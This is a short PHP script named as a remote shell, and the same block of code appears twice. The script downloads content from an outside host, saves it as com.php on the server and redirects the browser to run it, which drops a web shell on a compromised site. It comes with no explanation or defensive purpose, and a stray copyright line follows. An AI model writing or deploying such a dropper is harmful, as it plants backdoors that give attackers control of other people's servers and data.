remote_tiga-lima_shell.php
<?php
$namafile="com.php";
$file = fopen($namafile ,'w+');
$fa=file_get_contents('http://www.aliggroup.com/upload/log.txt');
$write = fwrite ($file ,$fa);
header ("location:com.php");
?>
<?php
$namafile="com.php";
$file = fopen($namafile ,'w+');
$fa=file_get_contents('http://www.aliggroup.com/upload/log.txt');
$write = fwrite ($file ,$fa);
header ("location:com.php");
?>

Copyright © 2011 Mikey Beck. All Rights Reserved